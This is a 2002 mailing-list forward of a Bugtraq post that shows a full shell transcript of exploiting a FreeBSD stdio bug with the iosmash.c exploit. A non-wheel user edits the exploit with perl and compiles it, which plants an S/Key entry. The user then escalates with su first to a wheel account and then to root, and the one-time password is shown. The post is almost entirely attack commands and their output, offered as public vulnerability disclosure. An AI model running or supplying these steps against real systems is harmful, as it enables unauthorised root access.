[FUGSPBR] En: full info on iosmash.c as non wheel user
Flavio Alberto
applein at tutopia.com.br
Wed Apr 24 22:19:01 BRT 2002
----- Original Message -----
From: John Scimone <jscimone at cc.gatech.edu>
To: <bugtraq at securityfocus.com>
Cc: <vuln-dev at securityfocus.com>
Sent: Tuesday, April 23, 2002 7:25 PM
Subject: full info on iosmash.c as non wheel user
> from phased....
>
> I didn't think such would be necessary but due to the high volume of emails it
> has proved so, below is a transcript of exploiting the stdio bug on FreeBSD as
> a user not in the wheel group
>
> Welcome to FreeBSD!
> > id
> uid=1000(d0tslash) gid=1000(d0tslash) groups=1000(d0tslash)
> >
> > grep wheel /etc/group
> wheel:*:0:root,akt0r-root,misterx
> >
> > perl -pi -e 's/root /misterx /g' iosmash.c
> > gcc -o iosmash.c iosmash
> >./iosmash
> Adding d0tslash:
> <--- HIT CTRL-C --->
> > grep 98 iosmash.c
> s/key 98 snosoft2
> 98: MASS OAT ROLL TOOL AGO CAM
> "\nmisterx 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666 01:02:03\n");
> > su misterx
> s/key 98 snosoft2
> Password:MASS OAT ROLL TOOL AGO CAM
> %pwd
> /usr/home/d0tslash
> %id
> uid=1001(misterx) gid=1001(misterx) groups=1001(misterx), 0(wheel), 1006(cvsusers)
> %cd ~
> %grep "root " iosmash.c
> decided to make a trivial exploit to easily get root :)
> "\nroot 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666 01:02:03\n");
> %gcc -o iosmash iosmash.c
> %./iosmash
> Updating misterx:
> Old key: snosoft2
> <--- HIT CTRL-C --->
> %su
> s/key 98 snosoft2
> Password:MASS OAT ROLL TOOL AGO CAM
> xes#
>
>